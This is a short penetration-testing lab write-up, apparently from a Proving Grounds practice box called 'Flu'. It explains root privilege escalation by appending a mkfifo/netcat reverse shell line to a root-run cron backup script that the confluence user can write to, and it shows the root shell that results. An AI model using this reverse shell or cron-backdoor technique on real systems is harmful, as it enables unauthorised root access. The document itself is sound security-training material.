InfoSec LAB

Flu_Privilege_Escalation

Created: 2 min read

Overwriting Cronjob File

The root cronjob executes the Bash script log-backup.sh, which archives the Confluence log directory to /root/backup with a timestamp and deletes old backups. The script was identified by PSPY and PEAS, confirming its execution and location. Notably, log-backup.sh is owned by the confluence user, allowing potential modification. This ownership presents a privilege escalation opportunity since the script runs with root privileges.

confluence@flu:/opt$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f' >> /opt/log-backup.sh

Appending a reverse shell command to the /opt/log-backup.sh file

confluence@flu:/opt$ cat log-backup.sh
#!/bin/bash
 
CONFLUENCE_HOME="/opt/atlassian/confluence/"
LOG_DIR="$CONFLUENCE_HOME/logs"
BACKUP_DIR="/root/backup"
TIMESTAMP=$(date "+%Y%m%d%H%M%S")
 
# Create a backup of log files
cp -r $LOG_DIR $BACKUP_DIR/log_backup_$TIMESTAMP
 
tar -czf $BACKUP_DIR/log_backup_$TIMESTAMP.tar.gz $BACKUP_DIR/log_backup_$TIMESTAMP
 
# Cleanup old backups
find $BACKUP_DIR -name "log_backup_*"  -mmin +5 -exec rm -rf {} \;
 
 
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.198 1234 >/tmp/f

Updated /opt/log-backup.sh file

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/flu]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.198] from (UNKNOWN) [192.168.144.41] 39444
bash: cannot set terminal process group (25439): Inappropriate ioctl for device
bash: no job control in this shell
root@flu:~# whoami
whoami
root
root@flu:~# hostname
hostname
flu
root@flu:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:08:79 brd ff:ff:ff:ff:ff:ff
    altname enp3s0
    inet 192.168.144.41/24 brd 192.168.144.255 scope global ens160
       valid_lft forever preferred_lft forever

System level compromise

Interactive Graph View

Backlinks